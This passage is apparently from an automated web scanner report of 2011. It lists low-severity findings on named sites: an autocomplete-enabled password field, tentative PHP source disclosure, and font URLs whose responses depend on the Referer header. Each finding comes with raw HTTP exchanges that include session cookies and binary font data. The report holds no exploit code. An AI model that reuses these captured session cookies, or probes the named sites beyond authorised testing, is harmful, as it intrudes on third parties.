...[SNIP]...

11.16. http://www.whitefence.com/category/television-service/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/television-service/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:27 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<div class="returningUser">
   <form style="display:none;" name="form1" id="returningUserForm" action="https://www.whitefence.com/WebObjects/WhiteFence.woa/wa/login" method="post" >
   <fieldset>
...[SNIP]...
</label>
           <input id="password-field" type="password" name="upwd" title="Password" value="" tabindex="998" class="input-desc password" />
       </div>
...[SNIP]...

12. Source code disclosure  previous  next
There are 3 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


12.1. http://frontier.my.yahoo.com/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://frontier.my.yahoo.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET / HTTP/1.1
Host: frontier.my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:29:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: U_mtupes=YToyOntzOjE6ImIiO3M6MTM6ImVpMDhxY2Q3NXZjNGQiO3M6MjoibXQiO2k6MTMxNTMxMjE4Nzt9; expires=Fri, 06-Sep-2013 12:29:47 GMT; path=/; domain=my.yahoo.com
Expires: Thu, 01 Jan 1995 22:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:29:47 GMT
Cache-Control: private, no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MYFMP_Sacfea3=d=7142216504e66123b932767.54181906&s=6JRSdtjl3lb3w.8KyXWmOA--; expires=Mon, 05-Sep-2011 12:29:47 GMT; path=/; domain=frontier.my.yahoo.com; httponly
Set-Cookie: MYTMI=4; expires=Wed, 05-Sep-2012 12:29:47 GMT; path=/; domain=my.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 171806

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="ua-wk ua-win">
<head>
<script>var gTop = Number(new Date());</script> <script> </s
...[SNIP]...
<a class="charticonlink charticon_normal" href="javascript:void(0)" id="yfi_ms_chart_^DJI"><?javax.xml.transform.disable-output-escaping ?>&nbsp; &nbsp;<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a href="http://finance.yahoo.com/q?s=^DJI"><?javax.xml.transform.disable-output-escaping ?>Dow<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a class="charticonlink charticon_normal" href="javascript:void(0)" id="yfi_ms_chart_^IXIC"><?javax.xml.transform.disable-output-escaping ?>&nbsp; &nbsp;<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a href="http://finance.yahoo.com/q?s=^IXIC"><?javax.xml.transform.disable-output-escaping ?>Nasdaq<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a class="charticonlink charticon_normal" href="javascript:void(0)" id="yfi_ms_chart_^GSPC"><?javax.xml.transform.disable-output-escaping ?>&nbsp; &nbsp;<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<a href="http://finance.yahoo.com/q?s=^GSPC"><?javax.xml.transform.disable-output-escaping ?>S&P 500<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...
<p><?javax.xml.transform.disable-output-escaping ?>

<p>
...[SNIP]...
</b> Stocks had logged back-to-back losses before they entered the holiday weekend, but the break has done anything to cool selling interest. Premarket participants are applying sh<?javax.xml.transform.disable-output-escaping ?>
...
       
<a href="http://finance.yahoo.com/marketupdate/overview">
more
<?javax.xml.transform.disable-output-escaping ?>&raquo;<?javax.xml.transform.disable-output-escaping ?></a>
...[SNIP]...

12.2. http://www.aptela.com/my-account/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...
<div id="sidebar">

           <?php
$pageTitle = '{embed:pageTitle}';
$sectionTitle = '{embed:sectionTitle}';
$subsectionTitle = '{embed:subsectionTitle}';
?>


<ul id="subnav">
...[SNIP]...

12.3. http://www.aptela.com/my-account/login-error/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...
<div id="sidebar">

           <?php
$pageTitle = '{embed:pageTitle}';
$sectionTitle = '{embed:sectionTitle}';
$subsectionTitle = '{embed:subsectionTitle}';
?>


<ul id="subnav">
...[SNIP]...

13. Referer-dependent response  previous  next
There are 12 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



13.1. http://f.fontdeck.com/f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://f.fontdeck.com
Path:   /f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff

Request 1

GET /f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa25771a-69c3-6dc8-936e-8033d70586df

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:42 GMT
Server: FontdeckServer/1.84
Access-Control-Allow-Origin: http://www.fairpoint.com
Cache-Control: private, must-revalidate, no-transform, max-age=0
Set-Cookie: b014036c-ff33-e93b-97db-8f909bf61d6b
Expires: Thu, 23 Feb 2012 05:00:00 UTC
ETag: "2835-b8d98c17c3f427304fa74db3d742bf20"-gzip
Vary: Accept-Encoding
Content-Type: font/ttf
Content-Length: 89574

wOFF......]........\......\|...j............FFTM............Z..GGDEF......._...t!r.:GPOS......%....v||o=GSUB..'........6ek._OS/2..,....R...`.n..cmap..-........nr...cvt ..0.........!z.    fpgm..1`.......e../.gasp..3.............glyf..3 ......!t.#..head..A....5...6.2bChhea..A....!...$...ohmtx..B....4.......cloca..H<...e.....Y..maxp..O.... ... ....name..O....].....)`tpost..Q$..
.......tTprep..[........h!).W.................4..........x...A
.@.C.$....6
u.`O..`A......z....o..@...&. KW.    .fc.........{.f..A......Y.......O...~.    jH...x...tU.............H...R./D@2...H.."".Y.b1ZD.b.........S.:.E.. E.....1/.y.L...1.d...k...4.)e(...>.....@n....Y..s.........{.(....e.........r....e7}C..!{1.....>..../.......0N.....=(    ..../)...{..XI...I.`.{}.5.F.Pb8~GmW;..........:/8....xh.K.>......1....s$...S./.x.......b...b.c..}'.7...~<..A..v.......!.C......]....ih..+......W.....E|N.......K.v....m....P......'.[.{    ...........~.......C.....(........L.A......N|7.7............%mJz)i..b....I...w8.0...w..........t...?.....F..qpD.............S.H..r$.m..#/.y...G..ypd...F~2.d....zA.7S...J.q...'..J..-+mA...Mi..N._.~]zV......._I7......3........3.g.f...N..L'st.e..g^.93snfN......QY...=x.......&..7$C.:....t.$oq4NR.OFj......y2J..h.W..."]&w....rP.0.E..}.gM....."i.n]...-.M.U.yJ.F.f............?.[....yZ.;.h[t.....io.<.&....4.....Y.../..@.R..-H[.....F-g...^..G.2u)t...* .Cm.~....m..5CW.4U@O...e..h.....^
.M.=..}..g..g..3[.8..s....\.-)..DR%..d....<.........N..L.Cf..........>.u....J........P.....r.%.YW...=..f.....h..-.Qu.H.W.....z.......Ql..#FF.]....6..).5..(..<x.....|`...:.k.B.5.%..j....j..
.......(~....O..2.r#Y
...[SNIP]...

Request 2

GET /f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fa25771a-69c3-6dc8-936e-8033d70586df

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 11:58:46 GMT
Server: FontdeckServer/1.84
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /f/1/UnpieXVSR28AA7Cv3GOxYcB89VHRVvBqMwFQ9b3VRyke4HZ7P/EWPkEAXwkDOVohF4s.woff
on this server.</p>
</body></html>

13.2. http://f.fontdeck.com/f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://f.fontdeck.com
Path:   /f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff

Request 1

GET /f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:41 GMT
Server: FontdeckServer/1.84
Access-Control-Allow-Origin: http://www.fairpoint.com
Cache-Control: private, must-revalidate, no-transform, max-age=0
Set-Cookie: 2c499d3b-50af-c0b1-9255-ec78552e32e1
Expires: Thu, 23 Feb 2012 05:00:00 UTC
ETag: "2837-51478a7f1aeb73d7491bb80279154a77"-gzip
Vary: Accept-Encoding
Content-Type: font/ttf
Content-Length: 95890

wOFF......v.......O<......u(...j............FFTM............Z...GDEF......._...t!r.:GPOS......*.....s.E.GSUB..,........6ek._OS/2..1....R...`.6.ccmap..1T.......nr...cvt ..5....\...\....fpgm..5x.......e../.gasp..7,............glyf..78.."...j.#j'Phead..Y....3...6.sc4hhea..Z,...#...$...fhmtx..ZP........<...loca..`.............maxp..hl... ... ...!name..h....d.....C.~post..i...
.......tTprep..t.........%.xb.................4.........2x...A
.@.C.$....6
u.`O..`A......z....o..@...&. KW.    .fc.........{.f..A......Y.......O...~.    jH...x....xT....k.0...@..@xH#jT.H..JQ.....>Pr(.....J........H..r).....PN..........4.).i..q..q.4.4M)...o..g2I&a."......g.Z..?..3[.....r.......H.L.......2.sK.........|..eKod/..8.S.|....../}....({F.....I...I...{...%j.    ...=.P.U..u...u
......o*..N..1.1....9..68yp......|`..!K....>....]......&...-..x..q.q....6n..a_......^..>....._...p.~..o..7...'...V&|7.W    'Gd.....G.F.J......O%^.x}bn.7.w'........tY.5I+..Oz!.p.kI.H.u.o..Jz'...O'.K^..t...2r..q#/.y.....v....G.....'G..5~...>=..Qm.N.jK.I.K..ru.-).S.Oy0....S^Lz+......!...............7F.25>....R.....g......?. ....L}=......L....io..HOL.H.(.........5......H.K...F.;..3...'...g3.7.-c{......f...e.Uc...Z.d~*...k3.e...?.A.......<5v...c..[0.....%.[2.{#N..9..qo.;9.tVl.eI.....$kU..Y..?d...K./K...}._..h..    G&..9.d.s.Ls..(g.$..3u.Z..e....2Z..T."i.#.....G%S....V..~.UW...Xv.,yI....we.......F.....4.........,.."Y......r....-....u...?Tf.:.w. 'd*.s.]&...dF,..l0..A..........O.|..S#4....0
....O......6.s..K....}.4K.s.Lp.J.3.d.....[..A.._......if...$U.u    ..e..(......\.........\....r'm9....d.3..e....'......Y7:..f..s....k....* ?.....\..
...[SNIP]...

Request 2

GET /f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 11:58:46 GMT
Server: FontdeckServer/1.84
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /f/1/Vi1LOEoyZW4AA6pm5SJGQPz72LalyhhI+uxdkhuANBvJEvI+4T8YXDfR3UumYtuUpEk.woff
on this server.</p>
</body></html>

13.3. http://f.fontdeck.com/f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://f.fontdeck.com
Path:   /f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff

Request 1

GET /f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:41 GMT
Server: FontdeckServer/1.84
Access-Control-Allow-Origin: http://www.fairpoint.com
Cache-Control: private, must-revalidate, no-transform, max-age=0
Set-Cookie: 8be144b0-a86d-6e6f-bd09-a267f35a4ee6
Expires: Thu, 23 Feb 2012 05:00:00 UTC
ETag: "2840-a6acb2b4196ba1b055dacda39851b85e"-gzip
Vary: Accept-Encoding
Content-Type: font/ttf
Content-Length: 88182

wOFF......Xv..............W....j............FFTM............Z...GDEF......._...t!r.:GPOS......%....v||o=GSUB..'........6ek._OS/2..,....R...`.6..cmap..-........nr...cvt ..0....b...b....fpgm..18.......e../.gasp..2.............glyf..2...    Q..'...K.head..<L...4...6..b.hhea..<....!...$....hmtx..<....;.......?loca..B....j....._..maxp..JL... ... ....name..Jl...e....@.G.post..K...
.......tTprep..V`.......    ...Y.................4.........x...A
.@.C.$....6
u.`O..`A......z....o..@...&. KW.    .fc.........{.f..A......Y.......O...~.    jH...x...tU.............H...R./D@2...H.."".Y.b1ZD.b.........S.:.E.. E.....1/.y.L...1.d...k...4.)e(...>.....@n....Y..s.........{.(....e.........r....e7}C..!{1.....>..../.......0N.....=(    ..../)...{..XI...I.`.{}.5.F.Pb8~GmW;..........:/8....xh.K.>......1....s$...S./.x.......b...b.c..}'.7...~<..A..v.......!.C......]....ih..+......W.....E|N.......K.v....m....P......'.[.{    ...........~.......C.....(........L.A......N|7.7............%mJz)i..b....I...w8.0...w..........t...?.....F..qpD.............S.H..r$.m..#/.y...G..ypd...F~2.d....zA.7S...J.q...'..J..-+mA...Mi..N._.~]zV......._I7......3........3.g.f...N..L'st.e..g^.93snfN......QY...=x.......&..7$C.:....t.$oq4NR.OFj......y2J..h.W..."]&w....rP.0.E..}.gM....."i.n]...-.M.U.yJ.F.f............?.[....yZ.;.h[t.....io.<.&....4.....Y.../..@.R..-H[.....F-g...^..G.2u)t...* .Cm.~....m..5CW.4U@O...e..h.....^
.M.=..}..g..g..3[.8..s....\.-)..DR%..d....<.........N..L.Cf..........>.u....J........P.....r.%.YW...=..f.....h..-.Qu.H.W.....z.......Ql..#FF.]....6..).5..(..<x.....|`...:.k.B.5.%..j....j..
.......(~....O..2.r#Y
...[SNIP]...

Request 2

GET /f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Date: Tue, 06 Sep 2011 11:58:46 GMT
Server: FontdeckServer/1.84
Content-Length: 278
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /f/1/a0N6UXFHczAAA0WmC7b6dK/aE1ZT8/xDkjgbvfJJQv5tfqEce3ZHfAPojbj35w3fFhI.woff
on this server.</p>
</body></html>

13.4. http://f.fontdeck.com/f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://f.fontdeck.com
Path:   /f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff

Request 1

GET /f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/residential/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e55bc9ca-f3b4-edc5-ab87-8453ff79eeef

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:52:30 GMT
Server: FontdeckServer/1.84
Access-Control-Allow-Origin: http://www.fairpoint.com
Cache-Control: private, must-revalidate, no-transform, max-age=0
Set-Cookie: c1d7b5b4-8972-c5a7-c758-c5c107af1cf9
Expires: Thu, 23 Feb 2012 05:00:00 UTC
ETag: "2841-e8295edda0096c1c4085dbeafb819964"-gzip
Vary: Accept-Encoding
Content-Type: font/ttf
Content-Length: 90534

wOFF......a...............`<...j............FFTM............Z...GDEF......._...t!r.:GPOS......%....v||o=GSUB..'........6ek._OS/2..,....R...`....cmap..-........nr...cvt ..0....|...|.p.wfpgm..1P.......e../.gasp..3.............glyf..3....H..'....:head..EX...5...6..b.hhea..E....!...$.>./hmtx..E....>.......*loca..K....l.....a. maxp..S`... ... ....name..S....f....LH..post..T...
.......tTprep.._t.......[..h..................4..........x...A
.@.C.$....6
u.`O..`A......z....o..@...&. KW.    .fc.........{.f..A......Y.......O...~.    jH...x...tU.............H...R./D@2...H.."".Y.b1ZD.b.........S.:.E.. E.....1/.y.L...1.d...k...4.)e(...>.....@n....Y..s.........{.(....e.........r....e7}C..!{1.....>..../.......0N.....=(    ..../)...{..XI...I.`.{}.5.F.Pb8~GmW;..........:/8....xh.K.>......1....s$...S./.x.......b...b.c..}'.7...~<..A..v.......!.C......]....ih..+......W.....E|N.......K.v....m....P......'.[.{    ...........~.......C.....(........L.A......N|7.7............%mJz)i..b....I...w8.0...w..........t...?.....F..qpD.............S.H..r$.m..#/.y...G..ypd...F~2.d....zA.7S...J.q...'..J..-+mA...Mi..N._.~]zV......._I7......3........3.g.f...N..L'st.e..g^.93snfN......QY...=x.......&..7$C.:....t.$oq4NR.OFj......y2J..h.W..."]&w....rP.0.E..}.gM....."i.n]...-.M.U.yJ.F.f............?.[....yZ.;.h[t.....io.<.&....4.....Y.../..@.R..-H[.....F-g...^..G.2u)t...* .Cm.~....m..5CW.4U@O...e..h.....^
.M.=..}..g..g..3[.8..s....\.-)..DR%..d....<.........N..L.Cf..........>.u....J........P.....r.%.YW...=..f.....h..-.Qu.H.W.....z.......Ql..#FF.]....6..).5..(..<x.....|`...:.k.B.5.%..j....j..
.......(~....O..2.r#Y
...[SNIP]...

Request 2

GET /f/1/bC1qWXhHMTIAA0H0YIndj9WLf+b1HyVPSq0Ne1BGQpWtkDR8eRpfxZdXphw4Obn5Lhs.woff HTTP/1.1
Host: f.fontdeck.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e55bc9ca-f3b4-edc5-ab87-8453ff79eeef

Response 2

HTTP/1.1 403 Forbidden
